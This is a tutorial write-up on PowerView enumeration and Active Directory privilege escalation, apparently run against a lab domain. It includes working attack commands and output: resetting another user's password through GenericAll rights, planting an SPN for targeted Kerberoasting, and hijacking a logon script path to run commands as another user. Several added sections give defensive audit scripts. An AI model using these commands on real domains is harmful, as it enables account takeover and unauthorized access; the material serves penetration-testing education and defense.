PowerView script usage for privilege escalation

The PowerView script can be used for Active Directory enumeration and privilege escalation.

The script can be downloaded from here.

I will explain a few scenarios in which I have used PowerView for enumeration and privilege escalation. Most of the time I upload the file to Windows like this (location C:\ProgramData).

Make sure to load the script with the command below:

Import-Module .\PowerView.ps1


Let's explore a few enumeration commands to understand the Active Directory domain.

Get-NetUser

There could be many users created in AD; to explore the users and their rights on the AD domain, use Get-NetUser:

*Evil-WinRM* PS C:\programdata> Get-Netuser

The same command can be used to filter for a specific username as well.

*Evil-WinRM* PS C:\programdata> Get-Netuser Oliver

The full output can be seen here for these commands.

To see only the usernames, we can use this command:

*Evil-WinRM* PS C:\programdata> Get-Netuser | select cn

cn
--
Administrator
Guest
krbtgt
Olivar Ava
Smith William
maria garcia

From this list you can run the command again to enumerate each username individually.


Other useful commands:

To see the last time the password was changed for each user:

Get-UserProperty -Properties pwdlastset

Search for specific words like "pass" or "built" in the user Description field to identify password hints or built-in accounts:

Find-UserField -SearchField Description -SearchTerm "pass"
Find-UserField -SearchField Description -SearchTerm "built"

The commands below can be used to hunt for hosts where privileged users are logged on; -CheckAccess additionally reports whether the current user has local admin access on those hosts, which can lead to privileged access.

Invoke-UserHunter
Invoke-UserHunter -CheckAccess
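
As an added example (not part of the original post), here is the defender-side counterpart of the Description and pwdlastset checks above: a function that reports accounts whose Description contains password-hint words and enabled accounts whose password is older than a threshold, so they can be cleaned up before anyone enumerates them. The live query assumes the RSAT ActiveDirectory module (Get-ADUser); the sample objects at the bottom are constructed.

```powershell
# Added example (not part of the original post): defender-side audit for the weaknesses the
# PowerView commands above look for. Assumes the RSAT ActiveDirectory module for the live query.

function Find-RiskyUserAttribute {
    [CmdletBinding()]
    param(
        # Any object carrying SamAccountName, Description, PasswordLastSet and Enabled
        # (Get-ADUser output works directly; the sample below is constructed).
        [Parameter(Mandatory, ValueFromPipeline)] [object] $User,
        [int] $MaxPasswordAgeDays = 365,
        # Words that usually mean a password hint or a built-in account note was left in Description
        [string[]] $HintWords = @('pass', 'pwd', 'built')
    )
    process {
        $findings = @()
        $desc = "$($User.Description)"
        foreach ($w in $HintWords) {
            if ($desc -match [regex]::Escape($w)) { $findings += "Description mentions '$w'" }
        }
        $cutoff = (Get-Date).AddDays(-$MaxPasswordAgeDays)
        if ($User.Enabled -and $User.PasswordLastSet -and $User.PasswordLastSet -lt $cutoff) {
            $findings += "password last set $($User.PasswordLastSet.ToString('yyyy-MM-dd'))"
        }
        if ($findings.Count -gt 0) {
            [pscustomobject]@{
                SamAccountName = $User.SamAccountName
                Findings       = $findings -join '; '
            }
        }
    }
}

# Live use on a domain-joined host (any authenticated domain user can read these attributes):
#   Get-ADUser -Filter * -Properties Description, PasswordLastSet, Enabled | Find-RiskyUserAttribute

# Constructed sample so the function can be tried without a domain.
$sample = @(
    [pscustomobject]@{ SamAccountName = 'svc_backup'; Description = 'Backup job, pass is Summer2021'
                       PasswordLastSet = (Get-Date).AddDays(-700); Enabled = $true }
    [pscustomobject]@{ SamAccountName = 'Guest'; Description = 'Built-in account for guest access'
                       PasswordLastSet = $null; Enabled = $false }
    [pscustomobject]@{ SamAccountName = 'maria'; Description = $null
                       PasswordLastSet = (Get-Date).AddDays(-30); Enabled = $true }
)
$sample | Find-RiskyUserAttribute | Format-Table -AutoSize
```

With the sample data, svc_backup is reported for both the hint word and the stale password, Guest only for the "built" match (it is disabled, so password age is ignored), and maria is not reported at all.
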

Get-NetDomain

To see the details of the domain, we can use this. Say you log in to a server and need to know the details of the Active Directory domain it is part of (in some cases it may be a local, stand-alone machine); you can use the command below.

*Evil-WinRM* PS C:\programdata> Get-NetDomain


Forest                  : object.local
DomainControllers       : {jenkins.object.local}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : jenkins.object.local
RidRoleOwner            : jenkins.object.local
InfrastructureRoleOwner : jenkins.object.local
Name                    : object.local

Get-NetDomainController

This command gets information about the server itself rather than the domain-level information we checked just now.

It gives you the details of the server where the Active Directory Domain Services are running, that is, the domain controller.

Get-NetDomainController


Forest                     : object.local
CurrentTime                : 7/19/2022 12:16:42 AM
HighestCommittedUsn        : 168579
OSVersion                  : Windows Server 2019 Standard
Roles                      : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain                     : object.local
IPAddress                  : fe80::3844:8996:fe12:afee%12
SiteName                   : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections         : {}
OutboundConnections        : {}
Name                       : jenkins.object.local
Partitions                 : {DC=object,DC=local, CN=Configuration,DC=object,DC=local, CN=Schema,CN=Configuration,DC=object,DC=local, DC=DomainDnsZones,DC=object,DC=local...}

Get-NetComputer

This command can be used to extract information about the computer objects in the domain. If the Active Directory Domain Services are running on the machine you query, you will see the domain controller attributes as well (as in the output below).

PS C:\programdata> Get-NetComputer


pwdlastset                    : 7/17/2022 5:07:06 PM
logoncount                    : 235
msds-generationid             : {87, 236, 75, 39...}
serverreferencebl             : CN=JENKINS,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=object,DC=local
badpasswordtime               : 12/31/1600 4:00:00 PM
msds-additionaldnshostname    : {WIN-LR8T2EF8VHM, JENKINS}
distinguishedname             : CN=JENKINS,OU=Domain Controllers,DC=object,DC=local
objectclass                   : {top, person, organizationalPerson, user...}
displayname                   : JENKINS$
lastlogontimestamp            : 7/17/2022 5:07:29 PM
name                          : JENKINS
primarygroupid                : 516
objectsid                     : S-1-5-21-4088429403-1159899800-2753317549-1000
samaccountname                : JENKINS$
localpolicyflags              : 0
codepage                      : 0
samaccounttype                : MACHINE_ACCOUNT
whenchanged                   : 7/18/2022 12:07:29 AM
accountexpires                : NEVER
cn                            : JENKINS
operatingsystem               : Windows Server 2019 Standard
instancetype                  : 4
msdfsr-computerreferencebl    : CN=WIN-LR8T2EF8VHM,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=object,DC=local
objectguid                    : f11ae853-8e36-4225-b5fe-7b882055f330
operatingsystemversion        : 10.0 (17763)
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Computer,CN=Schema,CN=Configuration,DC=object,DC=local
dscorepropagationdata         : {10/21/2021 9:48:46 AM, 10/21/2021 9:42:43 AM, 10/21/2021 4:25:27 AM, 1/1/1601 6:16:33 PM}
serviceprincipalname          : {ldap/JENKINS/ForestDnsZones.object.local, ldap/jenkins.object.local/ForestDnsZones.object.local, ldap/WIN-LR8T2EF8VHM/ForestDnsZones.object.local, ldap/WIN-LR8T2EF8VHM/DomainDnsZones.object.local...}
usncreated                    : 12293
lastlogon                     : 7/18/2022 5:07:01 PM
badpwdcount                   : 0
useraccountcontrol            : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
whencreated                   : 10/21/2021 4:25:27 AM
countrycode                   : 0
iscriticalsystemobject        : True
msds-supportedencryptiontypes : 28
usnchanged                    : 167991
ridsetreferences              : CN=RID Set,CN=JENKINS,OU=Domain Controllers,DC=object,DC=local
dnshostname                   : jenkins.object.local

More options related to this command:

Get-NetComputer -FullData
Get-NetComputer -Ping
Get-NetComputer -Operatingsystem "Windows Server 2019 Standard"

Get-UserProperty

This lists user properties, which helps to identify users with privileges that can be exploited.

Commands:

Get-UserProperty 
Get-UserProperty -Properties lastlogon

Get-NetForest & Get-NetForestCatalog

These give information about the AD forest the domain is part of and about its global catalog servers.

*Evil-WinRM* PS C:\programdata> Get-NetForest


RootDomainSid         : S-1-5-21-4088429403-1159899800-2753317549
Name                  : object.local
Sites                 : {Default-First-Site-Name}
Domains               : {object.local}
GlobalCatalogs        : {jenkins.object.local}
ApplicationPartitions : {DC=DomainDnsZones,DC=object,DC=local, DC=ForestDnsZones,DC=object,DC=local}
ForestModeLevel       : 7
ForestMode            : Unknown
RootDomain            : object.local
Schema                : CN=Schema,CN=Configuration,DC=object,DC=local
SchemaRoleOwner       : jenkins.object.local
NamingRoleOwner       : jenkins.object.local



*Evil-WinRM* PS C:\programdata> Get-NetForestcatalog


Forest                     : object.local
CurrentTime                : 7/20/2022 12:16:43 AM
HighestCommittedUsn        : 168041
OSVersion                  : Windows Server 2019 Standard
Roles                      : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain                     : object.local
IPAddress                  : fe80::3070:ba8f:4837:6896%12
SiteName                   : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections         : {}
OutboundConnections        : {}
Name                       : jenkins.object.local
Partitions                 : {DC=object,DC=local, CN=Configuration,DC=object,DC=local, CN=Schema,CN=Configuration,DC=object,DC=local, DC=DomainDnsZones,DC=object,DC=local...}

Get-NetForestDomain

This gives the same domain information we saw with the earlier commands:

*Evil-WinRM* PS C:\programdata> Get-NetForestdomain


Forest                  : object.local
DomainControllers       : {jenkins.object.local}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : jenkins.object.local
RidRoleOwner            : jenkins.object.local
InfrastructureRoleOwner : jenkins.object.local
Name                    : object.local

Get-NetLoggedon

To see the currently logged-on users we can use this command (only if you have admin rights on the target computer):

Get-DomainComputer | Get-NetLoggedon
Get-NetLoggedon -ComputerName JENKINS

Get-DomainPolicy

This can be used to extract the current domain policy, for example the password requirements and the Kerberos policy.

Get-DomainPolicy


Unicode        : @{Unicode=yes}
SystemAccess   : @{MinimumPasswordAge=1; MaximumPasswordAge=42; MinimumPasswordLength=7; PasswordComplexity=1; PasswordHistorySize=24; LockoutBadCount=0; RequireLogonToChangePassword=0; ForceLogoffWhenHourExpire=0; ClearTextPassword=0;
                 LSAAnonymousNameLookup=0}
KerberosPolicy : @{MaxTicketAge=10; MaxRenewAge=7; MaxServiceAge=600; MaxClockSkew=5; TicketValidateClient=1}
RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.Object[]}
Version        : @{signature="$CHICAGO$"; Revision=1}
Path           : \\object.local\sysvol\object.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
GPOName        : {31B2F340-016D-11D2-945F-00C04FB984F9}
GPODisplayName : Default Domain Policy

To see each policy section in a more readable way, you can index into the result like this:

*Evil-WinRM* PS C:\programdata> (Get-DomainPolicy)."KerberosPolicy"


MaxTicketAge         : 10
MaxRenewAge          : 7
MaxServiceAge        : 600
MaxClockSkew         : 5
TicketValidateClient : 1
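
Added example (not part of the original post): the values above are the ones to check first from the defender's side. LockoutBadCount=0 means failed logons never lock the account, and MinimumPasswordLength=7 is well below current guidance. This function compares a Get-DomainPolicy result against a small baseline; the thresholds are my own assumptions, not a published standard, and the sample input is constructed from the values shown on this page.

```powershell
# Added example (not part of the original post): compare the policy values Get-DomainPolicy returns
# against a baseline. The thresholds are assumptions chosen for illustration.

function Test-DomainPolicyBaseline {
    param(
        [Parameter(Mandatory)] $SystemAccess,    # the .SystemAccess member of Get-DomainPolicy output
        [Parameter(Mandatory)] $KerberosPolicy   # the .KerberosPolicy member
    )
    # Check name, the value read from the policy, and the condition it has to satisfy.
    $checks = @(
        @{ Name = 'MinimumPasswordLength >= 14'; Value = $SystemAccess.MinimumPasswordLength; Ok = { $args[0] -ge 14 } }
        @{ Name = 'PasswordComplexity enabled';  Value = $SystemAccess.PasswordComplexity;    Ok = { $args[0] -eq 1 } }
        @{ Name = 'PasswordHistorySize >= 24';   Value = $SystemAccess.PasswordHistorySize;   Ok = { $args[0] -ge 24 } }
        @{ Name = 'LockoutBadCount > 0';         Value = $SystemAccess.LockoutBadCount;       Ok = { $args[0] -gt 0 } }
        @{ Name = 'ClearTextPassword disabled';  Value = $SystemAccess.ClearTextPassword;     Ok = { $args[0] -eq 0 } }
        @{ Name = 'MaxTicketAge <= 10 h';        Value = $KerberosPolicy.MaxTicketAge;        Ok = { $args[0] -le 10 } }
        @{ Name = 'MaxClockSkew <= 5 min';       Value = $KerberosPolicy.MaxClockSkew;        Ok = { $args[0] -le 5 } }
    )
    foreach ($c in $checks) {
        $v  = [int]$c.Value            # Get-DomainPolicy hands these back as strings
        $ok = & $c.Ok $v
        [pscustomobject]@{
            Check  = $c.Name
            Value  = $v
            Result = $(if ($ok) { 'PASS' } else { 'FAIL' })
        }
    }
}

# Live use with PowerView loaded:
#   $p = Get-DomainPolicy
#   Test-DomainPolicyBaseline -SystemAccess $p.SystemAccess -KerberosPolicy $p.KerberosPolicy

# Constructed sample mirroring the values shown in the output above.
$sys = [pscustomobject]@{ MinimumPasswordAge = 1; MaximumPasswordAge = 42; MinimumPasswordLength = 7
                          PasswordComplexity = 1; PasswordHistorySize = 24; LockoutBadCount = 0; ClearTextPassword = 0 }
$krb = [pscustomobject]@{ MaxTicketAge = 10; MaxRenewAge = 7; MaxServiceAge = 600; MaxClockSkew = 5; TicketValidateClient = 1 }
Test-DomainPolicyBaseline -SystemAccess $sys -KerberosPolicy $krb | Format-Table -AutoSize
```

On the values from this page the MinimumPasswordLength and LockoutBadCount checks come back FAIL and the rest PASS.
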

Get-NetOU

This helps to understand the organizational units (OUs) under the Active Directory domain. OUs are containers defined under the domain that hold objects such as users, computers and groups.

They let the domain admin apply policies (GPOs) to specific sets of users, computers or groups.

*Evil-WinRM* PS C:\programdata> Get-NetOU


usncreated             : 5804
systemflags            : -1946157056
iscriticalsystemobject : True
gplink                 : [LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=object,DC=local;0]
whenchanged            : 10/21/2021 4:24:29 AM
objectclass            : {top, organizationalUnit}
showinadvancedviewonly : False
usnchanged             : 5804
dscorepropagationdata  : {10/21/2021 9:48:46 AM, 10/21/2021 9:42:43 AM, 10/21/2021 4:25:27 AM, 1/1/1601 6:16:33 PM}
name                   : Domain Controllers
description            : Default container for domain controllers
distinguishedname      : OU=Domain Controllers,DC=object,DC=local
ou                     : Domain Controllers
whencreated            : 10/21/2021 4:24:29 AM
instancetype           : 4
objectguid             : a66b3a78-610a-4958-8e3d-ae5afbcac112
objectcategory         : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=object,DC=local

Get-NetGroup

It can be used to get information about groups. The output is found here.

To get specific information, such as the admin groups or the groups a particular user belongs to, the command can be used with filters.

*Evil-WinRM* PS C:\programdata> Get-NetGroup *admin*

*Evil-WinRM* PS C:\programdata> Get-NetGroup -Username maria


usncreated             : 12348
grouptype              : GLOBAL_SCOPE, SECURITY
samaccounttype         : GROUP_OBJECT
samaccountname         : Domain Users
whenchanged            : 10/21/2021 4:25:27 AM
objectsid              : S-1-5-21-4088429403-1159899800-2753317549-513
objectclass            : {top, group}
cn                     : Domain Users
usnchanged             : 12350
dscorepropagationdata  : {10/21/2021 9:48:46 AM, 10/21/2021 9:42:43 AM, 10/21/2021 9:27:59 AM, 10/21/2021 9:27:20 AM...}
memberof               : CN=Users,CN=Builtin,DC=object,DC=local
iscriticalsystemobject : True
description            : All domain users
distinguishedname      : CN=Domain Users,CN=Users,DC=object,DC=local
name                   : Domain Users
whencreated            : 10/21/2021 4:25:27 AM
instancetype           : 4
objectguid             : 69af56a2-9042-43e3-8142-5b2be2963d84
objectcategory         : CN=Group,CN=Schema,CN=Configuration,DC=object,DC=local

Other useful filters:

Get-NetGroup -domain object.local
Get-NetGroup -FullData

Privilege escalation using Active Directory rights/permissions

Once we find that a user has GenericAll rights over another user object, that can be used to change the other user's password:

Get-ObjectAcl -SamAccountName Oliver -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"}  


AceType               : AccessAllowed
ObjectDN              : CN=Olivar Ava,CN=Users,DC=object,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-4088429403-1159899800-2753317549-1103
InheritanceFlags      : None
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-4088429403-1159899800-2753317549-512
AccessMask            : 983551
AuditFlags            : None
AceFlags              : None
AceQualifier          : AccessAllowed

AceType               : AccessAllowed
ObjectDN              : CN=Olivar Ava,CN=Users,DC=object,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-4088429403-1159899800-2753317549-1103

The password change can be tried like this for another user:

whoami; net user smith Password#123
object\oliver
net.exe : System error 5 has occurred.
    + CategoryInfo          : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

It did not work due to some permission issues. The next method to change the password is PowerView's Set-DomainUserPassword:

PS C:\programdata> $rchitect = ConvertTo-SecureString 'Rch1tect' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity smith -AccountPassword $rchitect
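
Added example (not part of the original post), covering both this section and the WriteOwner section later on: an audit over the ACEs that Get-ObjectAcl returns, reporting control rights (GenericAll, GenericWrite, WriteDacl, WriteOwner, and WriteProperty/ExtendedRight that are not limited to a single attribute) held by principals other than the built-in admin groups. The trusted-SID list and the set of rights treated as dangerous are assumptions; the sample ACEs are constructed, modelled on the output above.

```powershell
# Added example (not part of the original post): audit ACEs returned by PowerView's Get-ObjectAcl and
# flag control rights held by principals that are not expected to have them. The trusted-SID list
# and the set of rights treated as dangerous are assumptions for illustration.

function Find-DangerousAce {
    [CmdletBinding()]
    param(
        # One ACE as Get-ObjectAcl -ResolveGUIDs returns it (ObjectDN, SecurityIdentifier,
        # ActiveDirectoryRights, AceQualifier, ObjectAceType).
        [Parameter(Mandatory, ValueFromPipeline)] [object] $Ace,
        # Principals expected to hold control rights: SYSTEM, BUILTIN\Administrators,
        # Domain/Enterprise/Schema Admins (RIDs 512/519/518).
        [string[]] $TrustedSidPatterns = @('^S-1-5-18$', '^S-1-5-32-544$', '-512$', '-519$', '-518$')
    )
    begin {
        $fullControl = 'GenericAll', 'GenericWrite', 'WriteDacl', 'WriteOwner'
        $scoped      = 'WriteProperty', 'ExtendedRight'   # only dangerous when not limited to one attribute
    }
    process {
        if ("$($Ace.AceQualifier)" -ne 'AccessAllowed') { return }
        $sid = "$($Ace.SecurityIdentifier)"
        foreach ($pat in $TrustedSidPatterns) { if ($sid -match $pat) { return } }

        $rights = "$($Ace.ActiveDirectoryRights)" -split ',\s*'
        $hits = @($rights | Where-Object { $fullControl -contains $_ })
        $type = "$($Ace.ObjectAceType)"          # resolved GUID name; empty or 'All' means unscoped
        if (-not $type -or $type -eq 'All') {
            $hits += @($rights | Where-Object { $scoped -contains $_ })
        }
        if ($hits.Count -gt 0) {
            [pscustomobject]@{ ObjectDN = $Ace.ObjectDN; Principal = $sid; Rights = $hits -join ', ' }
        }
    }
}

# Live use with PowerView loaded (read access to the objects is enough):
#   Get-ObjectAcl -SamAccountName Oliver -ResolveGUIDs | Find-DangerousAce

# Constructed sample ACEs modelled on the output shown above (SIDs reuse the domain SID from this page).
$domainSid = 'S-1-5-21-4088429403-1159899800-2753317549'
$sample = @(
    # Domain Admins with GenericAll: expected, not reported
    [pscustomobject]@{ ObjectDN = 'CN=Olivar Ava,CN=Users,DC=object,DC=local'; SecurityIdentifier = "${domainSid}-512"
                       ActiveDirectoryRights = 'GenericAll'; AceQualifier = 'AccessAllowed'; ObjectAceType = $null }
    # SELF may write one attribute (Web-Information): scoped, not reported
    [pscustomobject]@{ ObjectDN = 'CN=Smith William,CN=Users,DC=object,DC=local'; SecurityIdentifier = 'S-1-5-10'
                       ActiveDirectoryRights = 'ReadProperty, WriteProperty'; AceQualifier = 'AccessAllowed'; ObjectAceType = 'Web-Information' }
    # An ordinary user (RID 1106) holding GenericAll over another user: reported
    [pscustomobject]@{ ObjectDN = 'CN=Olivar Ava,CN=Users,DC=object,DC=local'; SecurityIdentifier = "${domainSid}-1106"
                       ActiveDirectoryRights = 'GenericAll'; AceQualifier = 'AccessAllowed'; ObjectAceType = $null }
    # An ordinary user with WriteDacl and WriteOwner on a group: reported
    [pscustomobject]@{ ObjectDN = 'CN=Domain Admins,CN=Users,DC=object,DC=local'; SecurityIdentifier = "${domainSid}-1104"
                       ActiveDirectoryRights = 'GenericRead, WriteDacl, WriteOwner'; AceQualifier = 'AccessAllowed'; ObjectAceType = $null }
)
$sample | Find-DangerousAce | Format-Table -AutoSize
```

The sample yields two findings (the RID 1106 and RID 1104 entries); the Domain Admins ACE is skipped by the trusted list and the SELF ACE because its WriteProperty is scoped to one attribute.
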

Kerberoasting

Some users show a WriteProperty permission when we run the same command as before:

Get-ObjectAcl -SamAccountName smith -ResolveGUIDs | ? {$_.ActiveDirectoryRights}

AceQualifier           : AccessAllowed
ObjectDN               : CN=Smith William,CN=Users,DC=object,DC=local
ActiveDirectoryRights  : ReadProperty, WriteProperty
ObjectAceType          : Web-Information
ObjectSID              : S-1-5-21-4088429403-1159899800-2753317549-1104
InheritanceFlags       : None
BinaryLength           : 40
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-10
AccessMask             : 48
AuditFlags             : None
IsInherited            : False
AceFlags               : None
InheritedObjectAceType : All
OpaqueLength           : 0

Even when I tried changing the password with the above methods it did not work. So I am going to use the Kerberoasting method on the next user. For this we need to set an SPN. With this permission we can set an SPN for another user without knowing their password. I am going to set the SPN "nonexistent/rchitect" for user maria by logging in as user "smith", without knowing maria's password. This was possible due to the Active Directory permission WriteProperty for user "smith".

*Evil-WinRM* PS C:\Programdata> Set-DomainObject -Identity maria -SET @{serviceprincipalname='nonexistent/rchitect'}
*Evil-WinRM* PS C:\Programdata> Get-DomainUser maria | Select serviceprincipalname

serviceprincipalname
--------------------
nonexistent/rchitect

This SPN value cannot be used for Kerberoasting; it has to follow the specific format Microsoft recommends. Refer to "Name Formats for Unique SPNs" (Win32 apps, Microsoft Docs) for the valid SPN format.

The SPN should be in the format below:

<service class>/<host>:<port>/<service name>

setspn -a MSSQLSvc/object.local:1433 object.local\maria

Checking domain DC=object,DC=local

Registering ServicePrincipalNames for CN=maria garcia,CN=Users,DC=object,DC=local
        MSSQLSvc/object.local:1433
Updated object
*Evil-WinRM* PS C:\Programdata> Get-DomainUser maria | Select serviceprincipalname

serviceprincipalname
--------------------
{MSSQLSvc/object.local:1433, newSvc/object.local:1838, nonexistent/rchitect}

Now we can use the credentials. I tried, and maybe because the machine I tried on seems broken, the password change did not work. However, the procedure below remains the same for other servers if you want to try it:

*Evil-WinRM* PS C:\Users\smith\Documents> $pass = ConvertTo-SecureString 'rchitect2a!' -AsPlainText -Force 
*Evil-WinRM* PS C:\Users\smith\Documents> $cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $pass)
*Evil-WinRM* PS C:\Users\smith\Documents> Get-DomainSPNTicket -SPN "MSSQLSvc/object.local:1433" -Credential $Cred
The term 'Get-DomainSPNTicket' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Get-DomainSPNTicket -SPN "MSSQLSvc/object.local:1433" -Credential $Cr ...
+ ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Get-DomainSPNTicket:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
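
Added example (not part of the original post): from the defender's side, Kerberoasting exposure comes down to which enabled user accounts carry SPNs, whether RC4 service tickets are still allowed for them, and whether the account is privileged. The function below rates each account on those three points. It assumes the RSAT ActiveDirectory module for the live query and uses the documented bit values of msDS-SupportedEncryptionTypes (0x4 RC4, 0x8 AES128, 0x10 AES256); the sample accounts are constructed (maria's SPN is the one set above, the two service accounts are hypothetical).

```powershell
# Added example (not part of the original post): list the user accounts exposed to Kerberoasting
# (enabled, with at least one SPN) and rate them by encryption type and group membership.
# Assumes the RSAT ActiveDirectory module for the live query.

function Get-KerberoastExposure {
    [CmdletBinding()]
    param(
        # Get-ADUser output with ServicePrincipalName, msDS-SupportedEncryptionTypes, MemberOf, Enabled
        [Parameter(Mandatory, ValueFromPipeline)] [object] $User,
        [string[]] $PrivilegedGroups = @('Domain Admins', 'Enterprise Admins', 'Administrators', 'Account Operators')
    )
    process {
        $spns = @($User.ServicePrincipalName | Where-Object { $_ })
        if ($spns.Count -eq 0 -or -not $User.Enabled) { return }

        $enc = [int]$User.'msDS-SupportedEncryptionTypes'
        # Unset (0) is treated as "RC4 still acceptable": the KDC then uses its domain defaults,
        # which include RC4 unless the domain has been hardened.
        $rc4 = ($enc -eq 0) -or (($enc -band 0x4) -ne 0)
        $aes = (($enc -band 0x8) -ne 0) -or (($enc -band 0x10) -ne 0)

        $priv = $false
        foreach ($g in @($User.MemberOf)) {
            foreach ($name in $PrivilegedGroups) {
                if ("$g" -match ('^CN=' + [regex]::Escape($name) + ',')) { $priv = $true }
            }
        }
        $risk = if ($priv -and $rc4) { 'HIGH' } elseif ($rc4) { 'MEDIUM' } elseif ($priv) { 'LOW-PRIVILEGED' } else { 'LOW' }
        [pscustomobject]@{
            SamAccountName = $User.SamAccountName
            SpnCount       = $spns.Count
            Rc4Allowed     = $rc4
            AesSupported   = $aes
            Privileged     = $priv
            Risk           = $risk
        }
    }
}

# Live use (any domain user can run this query):
#   Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName, 'msDS-SupportedEncryptionTypes', MemberOf, Enabled |
#       Get-KerberoastExposure | Sort-Object Risk | Format-Table -AutoSize

# Constructed sample: the SPN set on maria above, plus two hypothetical service accounts.
$sample = @(
    [pscustomobject]@{ SamAccountName = 'maria';   ServicePrincipalName = @('MSSQLSvc/object.local:1433'); 'msDS-SupportedEncryptionTypes' = $null
                       MemberOf = @('CN=Domain Users,CN=Users,DC=object,DC=local'); Enabled = $true }
    [pscustomobject]@{ SamAccountName = 'svc_sql'; ServicePrincipalName = @('MSSQLSvc/db01.object.local:1433'); 'msDS-SupportedEncryptionTypes' = 24
                       MemberOf = @(); Enabled = $true }
    [pscustomobject]@{ SamAccountName = 'svc_bak'; ServicePrincipalName = @('HTTP/bak01.object.local'); 'msDS-SupportedEncryptionTypes' = 28
                       MemberOf = @('CN=Domain Admins,CN=Users,DC=object,DC=local'); Enabled = $true }
)
$sample | Get-KerberoastExposure | Format-Table -AutoSize
```

With the sample, maria (no encryption types set, so RC4 is still possible) rates MEDIUM, svc_sql (24 = AES128+AES256 only) rates LOW, and svc_bak (28 includes RC4 and the account is in Domain Admins) rates HIGH. The fix for the MEDIUM and HIGH rows is a long random password on the service account, AES-only encryption types, and keeping SPN-bearing accounts out of privileged groups.
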

Logon script

As per this (Abusing Active Directory ACLs/ACEs, HackTricks), this works only when the user logs in to the server. In my case I don't have the option to test this, so I created a ping script.

*Evil-WinRM* PS C:\ProgramData> echo "ping 10.10.14.4" > ping.ps1
*Evil-WinRM* PS C:\ProgramData> Set-DomainObject -Identity maria -SET @{scriptpath="C:\\programdata\\ping.ps1"}

As soon as I hit the last command I can see continuous ICMP traffic on the target machine.

tcpdump at the target machine:

sudo tcpdump -ni tun0 icmp
[sudo] password for rocky: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
05:16:53.665283 IP 10.129.67.198 > 10.10.14.4: ICMP echo request, id 1, seq 5785, length 40
05:16:53.665325 IP 10.10.14.4 > 10.129.67.198: ICMP echo reply, id 1, seq 5785, length 40
05:16:54.674527 IP 10.129.67.198 > 10.10.14.4: ICMP echo request, id 1, seq 5788, length 40
05:16:54.674550 IP 10.10.14.4 > 10.129.67.198: ICMP echo reply, id 1, seq 5788, length 40
05:16:55.691912 IP 10.129.67.198 > 10.10.14.4: ICMP echo request, id 1, seq 5791, length 40
05:16:55.691939 IP 10.10.14.4 > 10.129.67.198: ICMP echo reply, id 1, seq 5791, length 40
05:16:56.712447 IP 10.129.67.198 > 10.10.14.4: ICMP echo request, id 1, seq 5794, length 40
05:16:56.712490 IP 10.10.14.4 > 10.129.67.198: ICMP echo reply, id 1, seq 5794, length 40
05:16:57.828371 IP 10.129.67.198 > 10.10.14.4: ICMP echo request, id 1, seq 5798, length 40

Now change the logon script to enumerate more sensitive information about other users.

To view the home directory contents of other users via their logon scripts:

*Evil-WinRM* PS C:\ProgramData> echo "ls \users\maria\ > \programdata\out" > cmd.ps1
*Evil-WinRM* PS C:\ProgramData> Set-DomainObject -Identity maria -SET @{scriptpath="C:\\programdata\\cmd.ps1"}
*Evil-WinRM* PS C:\ProgramData> ls


    Directory: C:\ProgramData


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-       10/21/2021   3:13 AM                Microsoft
d-----       10/21/2021  12:05 AM                regid.1991-06.com.microsoft
d-----        9/15/2018  12:19 AM                SoftwareDistribution
d-----        4/10/2020   5:48 AM                ssh
d-----        4/10/2020  10:49 AM                USOPrivate
d-----        4/10/2020  10:49 AM                USOShared
d-----        8/25/2021   2:57 AM                VMware
-a----        7/29/2022   2:28 AM             76 cmd.ps1
-a----        7/29/2022   2:29 AM           3476 out
-a----        7/29/2022   2:15 AM             36 ping.ps1
-a----        7/29/2022   1:35 AM         770279 PowerView.ps1


*Evil-WinRM* PS C:\ProgramData> cat out


    Directory: C:\users\maria


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---       10/22/2021   3:54 AM                3D Objects
d-r---       10/22/2021   3:54 AM                Contacts
d-r---       10/25/2021   3:47 AM                Desktop
d-r---       10/25/2021  10:07 PM                Documents
d-r---       10/22/2021   3:54 AM                Downloads
d-r---       10/22/2021   3:54 AM                Favorites
d-r---       10/22/2021   3:54 AM                Links
d-r---       10/22/2021   3:54 AM                Music
d-r---       10/22/2021   3:54 AM                Pictures
d-r---       10/22/2021   3:54 AM                Saved Games
d-r---       10/22/2021   3:54 AM                Searches
d-r---       10/22/2021   3:54 AM                Videos

